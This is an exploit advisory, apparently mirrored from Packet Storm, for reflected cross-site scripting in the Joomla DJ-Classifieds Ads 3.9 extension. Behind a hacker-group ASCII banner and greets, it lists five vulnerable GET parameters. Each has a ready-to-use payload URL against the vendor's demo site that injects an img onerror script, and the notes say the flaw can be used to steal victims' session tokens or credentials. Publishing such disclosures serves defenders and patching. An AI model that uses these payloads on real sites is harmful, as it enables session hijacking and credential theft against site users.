Exploit for Joomla DJ-Classifieds Ads 3.9 Cross Site Scripting

Name: Exploit for Joomla DJ-Classifieds Ads 3.9 Cross Site Scripting
Rating: 5 (141 reviews)
2022-09-30 | CVSS 0.1
## https://sploitus.com/exploit?id=PACKETSTORM:168571
┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
││ C r a C k E r ┌┘  
┌┘ T H E C R A C K O F E T E R N A L M I G H T ││  
└───────────────────────────────────────────────────────────────────────────────────────┘┘  
  
┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐  
┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
┌┘ [ Exploits ] ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘  
: Author : CraCkEr :  
│ Website : extensions.joomla.org │  
│ Vendor : DJ-Extensions │  
│ Software : DJ-Classifieds Ads 3.9 Extension for Joomla - Reflected XSS │  
│ Vuln Type: Reflected XSS │  
│ Method : GET │  
│ Impact : Manipulate the content of the site │  
│ │  
│────────────────────────────────────────────────────────────────────────────────────────│  
│ B4nks-NET irc.b4nks.tk #unix ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘  
: :  
│ Release Notes: │  
│ ═════════════ │  
│ The attacker can send to victim a link containing a malicious URL in an email or │  
│ instant message can perform a wide variety of actions, such as stealing the victim's │  
│ session token or login credentials │  
│ │  
┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
┌┘ ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘  
  
Greets:  
  
The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL   
  
CryptoJob (Twitter) twitter.com/CryptozJob  
  
┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
┌┘ © CraCkEr 2022 ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘  
  
  
GET parameter 'start' is vulnerable to XSS  
  
https://demo.dj-extensions.com/dj-classifieds-demo3/?start=6khflc"><img src=a onerror=alert(1)>hqr03  
  
GET parameter 'task' is vulnerable to XSS  
  
https://demo.dj-extensions.com/dj-classifieds-demo3/classifieds-front/category-blog-layout?task=parsesearchppbyq"><img src=a onerror=alert(1)>a8ex2  
  
GET parameter 'se' is vulnerable to XSS  
  
https://demo.dj-extensions.com/dj-classifieds-demo3/classifieds-front/category-blog-layout?se=ce3x1"><img src=a onerror=alert(1)>jlih5  
  
GET parameter 'se_radius_unit' is vulnerable to XSS  
  
https://demo.dj-extensions.com/dj-classifieds-demo3/classifieds-front/category-blog-layout?se=1&se_radius_unit=kmjqbjk"><img src=a onerror=alert(1)>cnrhh  
  
GET parameter 'se_radius' is vulnerable to XSS  
  
https://demo.dj-extensions.com/dj-classifieds-demo3/classifieds-front/category-blog-layout?se=1&se_radius_unit=km&se_radius=50k1yfg"><img src=a onerror=alert(1)>y1lp9  
  
  
  
[-] Done